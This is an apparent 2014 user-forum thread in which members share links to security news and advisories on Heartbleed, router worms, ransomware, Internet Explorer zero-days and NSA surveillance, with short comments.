http://talater.com/chrome-is-listening/
I wonder if this affects chromium based browsers as well since Chrome is based of it.
-
Visited Yahoo recently? You may have malware!
http://blogs.norman.com/2014/for-consumption/visited-yahoo-recently-you-may-have-malware
-
Important Security Update for Yahoo Mail Users
http://yahoo.tumblr.com/post/75083532312/important-security-update-for-yahoo-mail-users
-
Data snooping revelations, what can developers do to better protect users? (They let it slip :( )
Read: http://stackoverflow.com/questions/21389844/with-the-nsa-data-snooping-revelations-what-can-app-developers-do-to-prevent-th
The angry-bird app developers did not even provide a blocking mechanism - all so-called "sitting data" could be snooped upon, slurped and exploited for BB surveillance purposes!
polonus
P.S. Note - On a side-line.
We had some interesting thread here on blocking/uninstalling geo-location from various software. Why this was I do not know but somehow we have both lost thread and user ::) In hindsight from the revelations of grand scale data exploitation/abuse he had a lot of prophetic insight there and then...
I know you cannot blame the surveillance institutions simply on geo-location data proliferation sec, but it has been and still is an importing facilitating factor where user snooping and user profiling is concerned. :-[
Read: http://www.ghacks.net/2010/05/10/how-to-disable-geolocation-in-google-chrome/
link author = Martin Brinkman
D
-
Malware infections “staying the same” say security experts
http://blogs.norman.com/2014/for-consumption/malware-infections-staying-the-same-say-security-experts
A new survey of computer security professionals has revealed that the amount of malware threats reaching users has stayed the same over the past year, and that users are more likely to be infected by surfing the internet than downloading attachments to emails.
-
Viruses now use your computer to infect your phone
http://blogs.norman.com/2014/for-consumption/viruses-now-use-your-computer-to-infect-your-phone
-
168 domains seized in grand counterfeit goods action: http://www.ice.gov/news/releases/1401/140130newyork.htm
polonus
-
About the danger of downloading ENC files and banking trojans: http://garwarner.blogspot.co.uk/2014/02/gameover-zeus-now-uses-encryption-to.html
article author = Gary Warner
Go over your logs and check!
polonus
-
it is not only NSA that watch over you ;D
NBC News' Richard Engel: My Computers, Cellphone Were Hacked 'Almost Immediately' In Sochi
http://www.huffingtonpost.com/2014/02/05/reporter-hacked-sochi-richard-engel_n_4731846.html
-
it is not only NSA that watch over you ;D
NBC News' Richard Engel: My Computers, Cellphone Were Hacked 'Almost Immediately' In Sochi
http://www.huffingtonpost.com/2014/02/05/reporter-hacked-sochi-richard-engel_n_4731846.html (http://www.huffingtonpost.com/2014/02/05/reporter-hacked-sochi-richard-engel_n_4731846.html)
I'm not planning to go there any time soon. :)
-
I will not go there too. You can watch the games in TV anyway. :)
-
New undetectable malcode as a new form of Iframe-injection hidden inside PNG-metadata.: http://blog.sucuri.net/2014/02/new-iframe-injections-leverage-png-image-metadata.html (link article author = Peter Framantik) -> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=bestbinfo.com/
Detected here: http://www.nictasoft.com/ace/malware-urls/5096298/
polonus
-
(http://tctechcrunch2011.files.wordpress.com/2014/02/screen-shot-2014-02-06-at-11-27-37-am.png?w=640&h=274)
New Ransomware Blocks Your DNS Connection And Forces Your Computer To Mine Bitcoins (http://techcrunch.com/2014/02/06/new-ransomware-blocks-your-dns-connection-and-forces-your-computer-to-mine-bitcoins/)
-
If you use Comcast change your passwords now
https://forums.malwarebytes.org/index.php?showtopic=141859&p=788025
-
News we should worry about: http://news.netcraft.com/archives/2014/02/07/are-there-really-lots-of-vulnerable-apache-web-servers.html
link article author = Paul Mutton
Got accustomed to that situation 8) - however shocking these results are! :o
polonus
P.S. Another reason to not spread the version number globally in the form of excessive header info for instance, question of configuration settings.
As a side-note within certain Apache configurations we cannot see what admins did to harden their server configuration,
so the survey results may be exaggerated. All updates and patches that could be run should be run however, that is a fact!
D
-
Java botnet hits Mac, Linux and Windows machines
http://www.theinquirer.net/inquirer/news/2326894/java-botnet-hits-mac-linux-and-windows-machines
The malware is a functioning botnet written entirely in Java and is capable of infecting computers running Windows, Mac OS X and Linux that have Oracle's Java software framework installed.
-
Exposed: Barclays account details for sale as 'gold mine' of up to 27,000 files is leaked in worst breach of bank data EVER
http://www.dailymail.co.uk/news/article-2554875/Barclays-account-details-sale-gold-27-000-files-leaked.html
-
http://www.theinquirer.net/inquirer/news/2328111/kaspersky-lab-unmasks-a-global-cyber-espionage-toolkit
Kaspersky Lab unmasks a global cyber espionage toolkit
The security firm announced its discovery of "The Mask" in a blog post and dissected it in a report, calling it "one of most advanced global cyber-espionage operations" it has ever seen.
-
hxxp://www.theinquirer.net/inquirer/news/2328111/kaspersky-lab-unmasks-a-global-cyber-espionage-toolkit
Already posted here http://forum.avast.com/index.php?topic=66267.msg1060810
-
Bitcoin stealer for Mac
New Apple Mac Trojan Called OSX/CoinThief Discovered
http://www.securemac.com/CoinThief-BitCoin-Trojan-Horse-MacOSX.php
-
Microsoft´s Bing complies with Chinese Censorship for all Chinese even outside China, read: https://zh.greatfire.org/blog/2014/feb/no-error-here-microsoft-deploying-chinese-censorship-global-scale
polonus
-
(https://blog.avast.com/wp-content/uploads/2014/02/1.png)
Frustrating user experience from a shady download portal (https://blog.avast.com/2014/02/12/24447/)
Maybe from now on, we also need to make sure that the program was
actually downloaded from a reputable place or, even better, from AVAST!
-
Hi bob3160,
Cybercrime and cyberscam rearing it's ugly head everywhere.
Please be aware. Thanks for the heads-up on this one, bob3160. ;)
Watch your clicks, folks, don't be fooled.
Yes, watch those clicks of yours on the Interwebs :-[
polonus
-
2014-02-04: Advisory: Netgear
https://www.syss.de/news-events/advisories/advisory-netgear/
-
New Zero-Day for Blue E abused: http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/new-ie-zero-day-found-in-watering-hole-attack-2.html
polonus
-
Scores of fake SSL certificates.
Read: http://news.netcraft.com/archives/2014/02/12/fake-ssl-certificates-deployed-across-the-internet.html
40% of mobile apps do not check for SSL-certificates:
http://blog.ioactive.com/2014/01/personal-banking-apps-leak-info-through.html
(link article autho =r Ariel Sanchez) -see attached image.
-
Linksys Worm "TheMoon" Summary: What we know so far
https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633
-
Important Kickstarter Security Notice
https://www.kickstarter.com/blog/important-kickstarter-security-notice
-
Microsoft Security Advisory (2934088)
http://technet.microsoft.com/en-us/security/advisory/2934088
Fix It: http://support.microsoft.com/kb/2934088/en-us
-
Microsoft Security Advisory (2934088)
http://technet.microsoft.com/en-us/security/advisory/2934088
Fix It: http://support.microsoft.com/kb/2934088/en-us
Interesting - only effects IE9 and IE10 - No problem with IE8 on XP since MS wouldn't allow XP to update to IE9 or IE10 ;)
-
GreedyWonk
Another flash zero day exploit.
http://www.fireeye.com/blog/technical/targeted-attack/2014/02/operation-greedywonk-multiple-economic-and-foreign-policy-sites-compromised-serving-up-flash-zero-day-exploit.html
-
After facebook acquired WhatsApp people in Europe do not trust tnat Messenger app any longer and are leaving the mobile app massively to install Russian developed Telegram-Messenger.
Couldn't this also be because of this news on reported security and apparent privacy problems? Re: http://www.praetorian.com/blog/whats-up-with-whatsapps-security-facebook-ssl-vulnerabilities
link article author = Paul Jauregui, a Praetorian security researcher.
SSL-problems in WhatsApp- This is the kind of stuff the NSA would love
, says Jauregui.
polonus
-
Microsoft Security Advisory (2934088)
http://technet.microsoft.com/en-us/security/advisory/2934088
Fix It: http://support.microsoft.com/kb/2934088/en-us
Interesting - only effects IE9 and IE10 - No problem with IE8 on XP since MS wouldn't allow XP to update to IE9 or IE10 ;)
This also is telling: The fact that only some versions are affected seems to mean that not all versions are updated and made secure in the same way at the same time.
-
A secure alternative for the Whatsapp community could or might be this Swiss Threema, a mobile messaging app that puts security first
See: https://threema.ch/en/ Their claim: you can rest assured that only you and the intended recipient can read your messages.
.
All security in these days however is only relative security and that is globally so. How far this is true also here I saw when I analyzed the SSL security headers on their very SSL-site, where I saw problems with x-content-type-options, x-xss-protection, x-frame options, content-security-policy with secure headers not being returned. Also not best practices performed on strict-transport-security. So for instance content sniffing stays overall possible also for this service, despite of what the claims, Found these insecurities from their https site analyzed with Recx Security Analyzer.
Authentication however seems for the larger part OK: https://www.ssllabs.com/ssltest/analyze.html?d=threema.ch
What I think. Stay calm, part of this is fear mongering. It is is all "a hype of the day", at least m.p.o.
polonus
-
Linksys Worm "TheMoon" Summary: What we know so far
https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633
Not just Linksys and Asus , but many other top selling brands are open to attack ....
http://www.bbc.co.uk/news/technology-26287517
A separate study by security firm Tripwire has found that 80% of the 25 best-selling routers available on Amazon are vulnerable to compromise.
Security researcher Craig Young from Tripwire said exploits had been publicly discussed and published for more than one-third of these devices.
The past 12 months have seen a flurry of interest in routers by security researchers keen to find bugs and loopholes. One project detailing their findings now lists hundreds of exploits for routers from 36 separate manufacturers.
-
Hi AdrianH,
That is why to have secure procedures you should use cable.
Despite what everybody claims wifi is not fully secure and it never will be.
What is "hanging in the air" can be trapped, tracked and even compromised.
Dlink Amplifiers can be used to abuse.
Not everybody is behind a proxy fire-walled and neatly configured home network,
that puts the browser screen topsy-turvy for eventual intruders and then denies them.
So watch out. Security of open wifi is even worse.
We had a lot of problems here in Europe with Fritzbox routers lately
and despite many ISP warnings still a whole army of users did not upgrade
and are still vulnerable to remote hacks.
pol
-
Apple promises fix 'very soon' for Macs with failed encryption
http://www.reuters.com/article/2014/02/22/us-apple-encryption-idUSBREA1L10220140222
https://www.imperialviolet.org/2014/02/22/applebug.html
-
Poisoned YouTube ads serve Caphaw banking trojan
http://www.scmagazine.com/poisoned-youtube-ads-serve-caphaw-banking-trojan/article/335465/
-
Poisoned YouTube ads serve Caphaw banking trojan
http://www.scmagazine.com/poisoned-youtube-ads-serve-caphaw-banking-trojan/article/335465/ (http://www.scmagazine.com/poisoned-youtube-ads-serve-caphaw-banking-trojan/article/335465/)
Another reason to always keep Java up to date !
-
@bob3160,
Or not use java at all.
@all
Internet Explorer was hit by most zero-days during all of 2013 when these zero-days were especially used on specific attacks against organizations and corporations.
This year we will see less Java attacks and more browser attacks according to FireEye, read: http://www2.fireeye.com/rs/fireye/images/fireeye-advanced-threat-report-2013.pdf
polonus
-
I haven't installed any Java on my Win8.1 laptop and haven't yet found anything that does not work.
-
Watch out for this Netflix “tech support” scam (http://arstechnica.com/security/2014/03/watch-out-for-this-netflix-tech-support-scam/)
A new twist on an old scam
-
Linksys Worm "TheMoon" Summary: What we know so far
https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633
Not just Linksys and Asus , but many other top selling brands are open to attack ....
http://www.bbc.co.uk/news/technology-26287517
A separate study by security firm Tripwire has found that 80% of the 25 best-selling routers available on Amazon are vulnerable to compromise.
Security researcher Craig Young from Tripwire said exploits had been publicly discussed and published for more than one-third of these devices.
The past 12 months have seen a flurry of interest in routers by security researchers keen to find bugs and loopholes. One project detailing their findings now lists hundreds of exploits for routers from 36 separate manufacturers.
More here: https://www.team-cymru.com/ReadingRoom/Whitepapers/2013/TeamCymruSOHOPharming.pdf
-
Watch out for this Netflix “tech support” scam (http://arstechnica.com/security/2014/03/watch-out-for-this-netflix-tech-support-scam/)
A new twist on an old scam
The avast third party support is terrible but does not stoop to that level.
The third party support does "use" the event viewer to scare users into thinking
there are issues which do not exist.
-
Attack campaign compromises 300,000 home routers, alters DNS settings
http://www.pcworld.com/article/2104380/attack-campaign-compromises-300000-home-routers-alters-dns-settings.html
Bitcoin bank Flexcoin closes after hack attack
http://www.theguardian.com/technology/2014/mar/04/bitcoin-bank-flexcoin-closes-after-hack-attack
-
Critical crypto bug leaves Linux, hundreds of apps open to eavesdropping
http://arstechnica.com/security/2014/03/critical-crypto-bug-leaves-linux-hundreds-of-apps-open-to-eavesdropping/
-
Russians Suspected In ‘Uroburos’ Digital Espionage Attacks
http://www.techweekeurope.co.uk/news/russian-intelligence-uroburos-malware-140494
-
Secunia Vulnerability Review 2014 - Highlights
http://secunia.com/vulnerability-review/
-
Zeus and other Cybercrime is retutning, a lot not being detected by the average scanners.
All the time I report on these URLs and Types in the Virus and Worms,
See for yourselves here: htxp://cybercrime-tracker.net/
Do not click on links there, you could get infested!
polonus
-
F-Secure is strongly opposing the hijacking of criminal bot-net C&C servers by the NSA, read: http://www.f-secure.com/weblog/archives/00002684.html
link article author = Sean
His quote is a rather harsh remark on the institution: The NSA: a morally and ethically bankrupt institution that makes others feel silly for bothering with due process.
polonus
P.S. Edit: NSA denies it ever was into such actions without the proper authorization.
-
Google Docs Users Targeted by Sophisticated Phishing Scam
http://www.symantec.com/connect/blogs/google-docs-users-targeted-sophisticated-phishing-scam
-
Google Docs Users Targeted by Sophisticated Phishing Scam
http://www.symantec.com/connect/blogs/google-docs-users-targeted-sophisticated-phishing-scam (http://www.symantec.com/connect/blogs/google-docs-users-targeted-sophisticated-phishing-scam)
It's nice to know that Symantec users are protected from this attack. :)
It would be much more important to know that avast! also protects you from this Phishing attempt...... ???
-
New online tool for analyzing web-based malware
hxxps://barracudalabs.com/2014/03/introducing-threatglass-new-industry-portal-offering-exploration-visualization-and-analysis-of-exploited-websites/
hxxp://www.threatglass.com/
-
Hi Charyb,
Thanks for posting that for us. :)
polonus
-
Avast: Windows XP users already attacked 6 times more often than Windows 7 users (http://www.pcworld.com/article/2109144/avast-windows-xp-users-already-attacked-6-times-more-often-than-windows-7-users.html#tk.nl_today)
(http://images.techhive.com/images/article/2014/03/windows-xp-hacked-avast-100250879-large.png)
-
Avast: Windows XP users already attacked 6 times more often than Windows 7 users (http://www.pcworld.com/article/2109144/avast-windows-xp-users-already-attacked-6-times-more-often-than-windows-7-users.html#tk.nl_today)
Strange that, when others have never been attacked in the time that I have had avast and XP. I guess Safe browsing practice, proactive measures, a healthy dose of scepticism/suspicion and common sense goes a long way ;D
-
Avast: Windows XP users already attacked 6 times more often than Windows 7 users (http://www.pcworld.com/article/2109144/avast-windows-xp-users-already-attacked-6-times-more-often-than-windows-7-users.html#tk.nl_today)
Strange that, when others have never been attacked in the time that I have had avast and XP. I guess Safe browsing practice, proactive measures, a healthy dose of scepticism/suspicion and common sense goes a long way ;D
That makes up for most of it. Luck also has some part in it. :)
-
An eco friendly email virus just for Vlk (https://blog.avast.com/2014/03/20/the-first-eco-friendly-email-virus/) :)
-
An eco friendly email virus just for Vlk (https://blog.avast.com/2014/03/20/the-first-eco-friendly-email-virus/) :)
LOL ;D
-
An eco friendly email virus just for Vlk (https://blog.avast.com/2014/03/20/the-first-eco-friendly-email-virus/) :)
LOL ;D
;D ;D ;D
-
Fake Tor browser for iOS laced with adware, spyware, members warn
http://arstechnica.com/security/2014/03/fake-tor-browser-for-ios-laced-with-adware-spyware-members-warn/
-
Syrian hackers claim to reveal how much FBI pays Microsoft for customer data
http://rt.com/usa/syrian-hackers-reveal-fbi-microsoft-205/
I hope this is the correct section of the forum to post this.
-
Pirated software malware to cost business $491bn in 2014, study shows
http://www.computerweekly.com/news/2240216380/Pirated-software-malware-to-cost-business-491-in-2014-study-shows (http://www.computerweekly.com/news/2240216380/Pirated-software-malware-to-cost-business-491-in-2014-study-shows)
-
New Hall of Shame site list: http://twofactorauth.org/ (sites without two-actor authorization, like Amazon, American Express, Citibank, Rackspace, Sugarsync & Healthcare.gov. Site author = Josh Davis.).
polonus
-
Google encrypts Gmail...
http://www.dailymail.co.uk/news/article-2586849/Google-encrypts-Gmail-thwart-NSA-attempts-snoop-emails.html
-
Microsoft Security Advisory (2953095) Vulnerability in Microsoft Word Could Allow Remote Code Execution
http://technet.microsoft.com/en-us/security/advisory/2953095
Fix-It: https://support.microsoft.com/kb/2953095
-
Text message command makes infected ATMs spew cash (http://www.pcworld.com/article/2111360/atm-malware-controlled-by-a-text-message-spews-cash.html#tk.nl_today)
I'm still looking but no luck so far locating one of these ATMs :)
-
New MitM attacks impersonate banking sites without triggering alerts [/quote[
http://blog.phishlabs.com/new-man-in-the-middle-attacks-leveraging-rogue-dns link article author = Don Jackson
polonus
-
Security vendor Trustwave named in Target-related suit (http://www.pcworld.com/article/2111980/security-vendor-trustwave-named-in-targetrelated-suit.html#tk.nl_today)
-
Target accelerates rollout of chip-enabled card readers
http://www.bizjournals.com/twincities/news/2014/03/26/target-accelerates-rollout-of-chip-enabled-cards.html (http://www.bizjournals.com/twincities/news/2014/03/26/target-accelerates-rollout-of-chip-enabled-cards.html)
-
20% of all malware ever created appeared in 2013
http://press.pandasecurity.com/news/20-of-all-malware-ever-created-appeared-in-2013/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+presspandasecurity+%28Press+Panda+Security%29
-
As users should know that regularly visit and look through my postings in the "virus and worms" on website analysis -
a large number of websites has outdated CMS, putting websites and visitors thereof at danger!
see: http://www.whitefirdesign.com/blog/2014/03/03/outdated-versions-of-joomla-2-5-x-and-3-x-widely-used/
and http://www.whitefirdesign.com/blog/2014/03/27/only-one-third-of-drupal-7-websites-are-up-to-date/
polonus
-
Hack of Boxee.tv exposes password data, messages for 158,000 users
http://arstechnica.com/security/2014/04/hack-of-boxee-tv-exposes-password-data-messages-for-158000-users/
-
New feature in Win32/Sality - a router’s primary DNS changer named Win32/RBrute: http://www.welivesecurity.com/2014/04/02/win32sality-newest-component-a-routers-primary-dns-changer-named-win32rbrute/ link article author = Benjamin Vanheuverzwijn.
polonus
-
What is your IP saying about you?
http://www.infobyip.com/
-
Zeus malware found with valid digital certificate
http://www.networkworld.com/news/2014/040414-zeus-malware-found-with-valid-280416.html?hpg1=bn (http://www.networkworld.com/news/2014/040414-zeus-malware-found-with-valid-280416.html?hpg1=bn)
-
What is your IP saying about you?
http://www.infobyip.com/
Well its about 250 miles off on my geographical location.
-
Child's play!
http://www.10news.com/news/5-year-old-ocean-beach-exposes-microsoft-xbox-vulnerability
-
Child's play!
http://www.10news.com/news/5-year-old-ocean-beach-exposes-microsoft-xbox-vulnerability (http://www.10news.com/news/5-year-old-ocean-beach-exposes-microsoft-xbox-vulnerability)
We must read the same publication. :)
-
The Heartbleed Bug
http://heartbleed.com/
-
Big increase of the abuse of legit (compromised) sites by cyber criminals: https://community.websense.com/blogs/websense-insights/archive/2014/04/03/websense-security-labs-2014-threat-report-uncovers-cyber-attack-trends.aspx (link publication author = Charles Renert)
polonus
-
The Heartbleed Bug
http://heartbleed.com/
Heartbleed affects much of internet. Time to change your passwords again.
http://blog.avast.com/2014/04/09/heartbleed-affects-much-of-internet-time-to-change-your-passwords-again/
-
All versions of WordPress are holed, critical security update available: http://wordpress.org/news/2014/04/wordpress-3-8-2/
link article author: Andrew Nacin.
polonus
-
The Heartbleed Hit List. Who has to change passwords? Read and check here: http://mashable.com/2014/04/09/heartbleed-bug-websites-affected/
link info authors = Amantha Murphy Kelly, Lorenzo Francheschi-Bicchierai, Seth Fiegerman, Adario Strange and Kurt Wagner
polonus
If you downloaded dropbox, well dropbox was/is vulnerable - so you have to change your passwords there!
-
More news about the Heartbleed Bug.
http://money.cnn.com/2014/04/10/technology/security/heartbleed-passwords/index.html?hpt=hp_t3
-
http://www.businessweek.com/news/2014-04-11/nsa-said-to-have-used-heartbleed-bug-exposing-consumers
NSA Said to Exploit Heartbleed Bug for Intelligence for Years
The U.S. National Security Agency knew for at least two years about a flaw in the way that many websites send sensitive information, now dubbed the Heartbleed bug, and regularly used it to gather critical intelligence, two people familiar with the matter said.
-
If the NSA stuck to what they were created for that's a good thing.
But they have way overstepped their mission. And are catching hell for it.
The NSA now has a huge image problem especially here in the U.S. of A.
-
If the NSA stuck to what they were created for that's a good thing.
But they have way overstepped their mission. And are catching hell for it.
The NSA now has a huge image problem especially here in the U.S. of A.
And in comparison to what some other countries are doing, the NSA is still in training..... :(
-
http://www.bbc.co.uk/news/technology-27028101
Heartbleed hacks hit Mumsnet and Canada's tax agency
-
Heartbleed arrest made!
One down but how many more? ???
http://money.cnn.com/2014/04/16/technology/security/canada-heartbleed/index.html?hpt=hp_t2
-
Chinese Anti-Virus Protects Windows XP PC During 13 Hours of Continuous Attacks
http://news.softpedia.com/news/Chinese-Anti-Virus-Protects-Windows-XP-PC-During-13-Hours-of-Continuous-Attacks-436187.shtml
-
Latest AV-Comparatives March test http://chart.av-comparatives.org/chart1.php
-
Latest AV-Comparatives March test http://chart.av-comparatives.org/chart1.php
C'mon Avast you can do better :)
-
Critical Java Update
http://krebsonsecurity.com/2014/04/critical-java-update-plugs-37-security-holes/
-
HeartBleed bug will get the attention it deserves, read here: http://www.dhs.gov/blog/2014/04/18/update-heartbleed
link article author = Phyllis Schneck, NPPD Deputy Under Secretary for Cybersecurity
polonus
-
Good video with Mark Russinovich.
Malware Hunting with the Sysinternals Tools
http://channel9.msdn.com/Events/TechEd/NorthAmerica/2013/ATC-B308#fbid=
-
Good video with Mark Russinovich.
Malware Hunting with the Sysinternals Tools
http://channel9.msdn.com/Events/TechEd/NorthAmerica/2013/ATC-B308#fbid=
Thank you for the link. ;D BTW, it is possible to directly download the file and view it later. Just click on the MP4 or WMV blue hyperlink just below the video window and download it and you can then watch later when you have the time. File size is 754 MB, so you will need a DSL connection or faster to get it tho, as dial-up would take eons. Just saying.
-
Internet security relies on a few volunteers.
http://money.cnn.com/2014/04/18/technology/security/heartbleed-volunteers/index.html
-
Cisco, Microsoft, VMware, and other tech giants unite behind critical open-source projects
http://www.zdnet.com/cisco-microsoft-vmware-and-other-tech-giants-unite-behind-critical-open-source-projects-7000028743/
-
Microsoft Security Advisory 2963983
Vulnerability in Internet Explorer Could Allow Remote Code Execution
https://technet.microsoft.com/en-US/library/security/2963983
-
To be protected against new IE zero day enable Enhanced Protected Mode,
read: http://blogs.msdn.com/b/ie/archive/2012/03/14/enhanced-protected-mode.aspx
polonus
-
No fix for XP users
http://blogs.norman.com/2014/business/no-fix-for-xp-users
-
Beware malware myths involving Malaysia Flight MH370
http://blogs.norman.com/2014/for-consumption/beware-malware-myths-involving-malaysia-flight-mh370
-
Avast responds to IE hacking.
http://blog.avast.com/2014/04/29/internet-explorer-users-avast-has-got-your-back-for-free/
-
Avast responds to IE hacking.
http://blog.avast.com/2014/04/29/internet-explorer-users-avast-has-got-your-back-for-free/
Great. :)
-
MS is releasing an IE update today for all versions (including XP) http://blogs.technet.com/b/msrc/archive/2014/05/01/out-of-band-release-to-address-microsoft-security-advisory-2963983.aspx
EDIT : Available now
-
No fix for XP users
http://blogs.norman.com/2014/business/no-fix-for-xp-users
MS is releasing an IE update today for all versions (including XP) http://blogs.technet.com/b/msrc/archive/2014/05/01/out-of-band-release-to-address-microsoft-security-advisory-2963983.aspx
EDIT : Available now
Whaddya know? Microsoft? For XP? Nice.
-
Microsoft Explains Why It Decided to Patch Windows XP Despite End of Support
http://news.softpedia.com/news/Microsoft-Explains-Why-It-Decided-to-Patch-Windows-XP-Despite-End-of-Support-440318.shtml
-
Microsoft Explains Why It Decided to Patch Windows XP Despite End of Support
http://news.softpedia.com/news/Microsoft-Explains-Why-It-Decided-to-Patch-Windows-XP-Despite-End-of-Support-440318.shtml
That was my best guess, XP with some 30% of OS Market share (not sure about their 26% claim) and many of then still using IE - if MS didn't patch then many of them would be forced to migrate to other browsers. That would be a big drop in Browser market share for IE.
Once they migrate to another browser, who knows even if they upgrade their OS they may stick with their new browser. MS want you to stick with IE, but to upgrade your OS, unfortunately for many that would mean a system upgrade/replacement.
-
An important example that the Internet is fundamentally broken/holed and big players are reluctant to fix it.
See this typical example of a so-called WONTFIX: http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html
link article author = Wang Jing
polonus
-
AV Comparatives analysis of Data Transmission of security products
http://www.ghacks.net/2014/05/03/av-comparatives-analysis-data-transmission-security-products/
-
Dropbox Scrambles To Block Leaks Of Shared Data
http://www.techweekeurope.co.uk/news/dropbox-scrambles-block-leaks-shared-data-144992
-
New ransomeware found on Android
http://www.theguardian.com/technology/2014/may/08/android-porn-koler-a-ransomware
-
New ransomeware found on Android
http://www.theguardian.com/technology/2014/may/08/android-porn-koler-a-ransomware (http://www.theguardian.com/technology/2014/may/08/android-porn-koler-a-ransomware)
http://forum.avast.com/index.php?topic=147567.msg1089993#msg1089993 (http://forum.avast.com/index.php?topic=147567.msg1089993#msg1089993) :)
-
Is making websites wiretap-ready for FBI surveillance backdoors undermining cybersecurity?
These experts think it is: https://cdt.org/blog/leading-security-experts-say-fbi-wiretapping-proposal-would-undermine-cybersecurity/
They did not listen, because that was a year ago and now? -> http://www.cnet.com/news/fbi-we-need-wiretap-ready-web-sites-now/
link article author = Declan McCullagh
polonus
-
Two interesting articles...
http://www.scmagazine.com/ransomware-on-android-scares-users-with-govt-notices-asks-for-300/article/346005/
http://www.scmagazine.com/report-shows-major-spike-in-malicious-emails-at-years-start/article/346003/
-
Microsoft Security Bulletin Summary May 2014
https://technet.microsoft.com/library/security/ms14-may
-
Adobe Security Bulletin
http://helpx.adobe.com/security/products/reader/apsb14-15.html
-
System admins upgraded to get a vulnerable Hearbleed server: https://vivaldi.net/en/blogs/entry/heartbleed-status-upgrading-to-heartbreak
link article author = Yngve Pettersen
Worse still that only 14 % of secure website admins were capable of coping with three step securing properly against Heartbreak: http://news.netcraft.com/archives/2014/05/09/keys-left-unchanged-in-many-heartbleed-replacement-certificates.html
What we call this, a case of "epic fail"?
polonus
-
CryptoWall ransomware gives you an additional fine: http://www.bleepingcomputer.com/forums/t/533715/cryptowall-a-new-ransomware-from-the-creators-of-cryptodefense/ (poster = Grimler)
polonus
-
Urgent Security Update Regarding Your Bitly Account
http://blog.bitly.com/post/85169217199/urgent-security-update-regarding-your-bitly-account
-
Why You Should Ditch Adobe Shockwave
http://krebsonsecurity.com/2014/05/why-you-should-ditch-adobe-shockwave/
-
eBay users, change passwords NOW!
http://www.bbc.co.uk/news/technology-27504142
-
Hole in IE8 left open: http://zerodayinitiative.com/advisories/ZDI-14-140/ (deadline passed 108 days ago)
polonus
-
Hole in IE8 left open: http://zerodayinitiative.com/advisories/ZDI-14-140/ (http://zerodayinitiative.com/advisories/ZDI-14-140/) (deadline passed 108 days ago)
polonus
All the more reason to update to something more secure than Windows XP
If you're still using XP, then at least change to a more secure browser like Chrome (https://www.google.com/intl/en_us/chrome/browser/) or Firefox (http://www.mozilla.org/en-US/firefox/new/)
-
More on the eBay disaster.
http://www.telegraph.co.uk/technology/internet-security/10849689/eBay-hacking-online-gangs-are-after-you.html
Up to 233 million people have had their personal details stolen – their telephone numbers, their names, their postal and email addresses, their dates of birth and the passwords to their accounts. Of those 233 million, 15 million were eBay customers in Britain.
-
How to Update Windows XP After End of Support
http://news.softpedia.com/news/How-to-Update-Windows-XP-after-End-of-Support-443631.shtml
I am not brave enough to try this on my other PC.
-
IoT, cloud computing, and nation-state threats redefine enterprise security
http://www.computerworld.com/s/article/9248523/IoT_cloud_computing_and_nation_state_threats_redefine_enterprise_security (http://www.computerworld.com/s/article/9248523/IoT_cloud_computing_and_nation_state_threats_redefine_enterprise_security)
-
World Cup websites struck!
http://www.zdnet.com/world-cup-websites-struck-down-by-ddos-attacks-7000030479/
-
Urgent Alert: Increasing Cryptolocker Traffic http://blogs.norman.com/2014/business/urgent-alert-increasing-crytolocker-traffic
-
Urgent Alert: Increasing Cryptolocker Traffic http://blogs.norman.com/2014/business/urgent-alert-increasing-crytolocker-traffic
Thanks, Pondus. The latest version (6) of CryptoPrevent was released just yesterday.
http://www.foolishit.com/vb6-projects/cryptoprevent/
-
Hackers blackmailing Domino's Pizza for a €30,000 slice of earnings
http://www.v3.co.uk/v3-uk/news/2350220/hackers-blackmailing-dominos-pizza-for-a-eur30-000-slice-of-earnings (http://www.v3.co.uk/v3-uk/news/2350220/hackers-blackmailing-dominos-pizza-for-a-eur30-000-slice-of-earnings)
-
how nice.... i bet it is cheap also.... i will take two ;D
Android phone built in China comes equipped with malware
http://www.phonearena.com/news/Android-phone-built-in-China-comes-equipped-with-malware_id57159
-
Another RAT crawls out of the malware drain
http://www.theregister.co.uk/2014/06/17/another_rat_crawls_out_of_the_malware_drain/
-
Google-owned VirusTotal releases file-scanning tool for Mac users
http://www.pcworld.co.nz/article/546082/google-owned_virustotal_releases_file-scanning_tool_mac_users/
-
Thousands and thousands of servers leak admin password in plain text via port 49152.
Identification is easy using the Shodan search engine.
Read about the threat here: http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/
Confirmed here as an urge to patch: https://isc.sans.edu/diary/New+Supermicro+IPMIBMC+Vulnerability/18285
polonus
-
LinkedIn 0day Vulnerability Puts Your Data at Risk
http://blog.zimperium.com/linkedin-0day-vulnerability-puts-your-data-at-risk/
-
Automated False Positives
http://www.pandasecurity.com/mediacenter/malware/automated-false-positives/
-
Automated False Positives
http://www.pandasecurity.com/mediacenter/malware/automated-false-positives/
Hi Pondus,
Very interesting read on false positives created by generic heuristic detection. So one av manipulating the detection of another.
With malsites the most important cause of false positives are benign sites that are hosted on bad hosting Autonomous Systems. This is the main class of false positive website flags.
Of course for files the misinterpretation of packer obfuscation patterns is the main cause of false positive finds.
Damian
-
Automated False Positives
http://www.pandasecurity.com/mediacenter/malware/automated-false-positives/
Hi Pondus,
Very interesting read on false positives created by generic heuristic detection. So one av manipulating the detection of another.
With malsites the most important cause of false positives are benign sites that are hosted on bad hosting Autonomous Systems. This is the main class of false positive website flags.
Of course for files the misinterpretation of packer obfuscation patterns is the main cause of false positive finds.
Damian
Note how avast! did not join the charade. ;)
-
Google Glasses can be used to steal PIN numbers!
http://www.telegraph.co.uk/technology/google/10924369/How-Google-Glass-can-be-used-to-steal-your-PIN-code.html
-
Google Glasses can be used to steal PIN numbers!
http://www.telegraph.co.uk/technology/google/10924369/How-Google-Glass-can-be-used-to-steal-your-PIN-code.html (http://www.telegraph.co.uk/technology/google/10924369/How-Google-Glass-can-be-used-to-steal-your-PIN-code.html)
I'm sure there are cheaper ways to do that task.... :)
-
Malicious saudi-arabian surveillance spyware app :
http://www.hrw.org/news/2014/06/27/saudi-arabia-malicious-spyware-app-identified
polonus
-
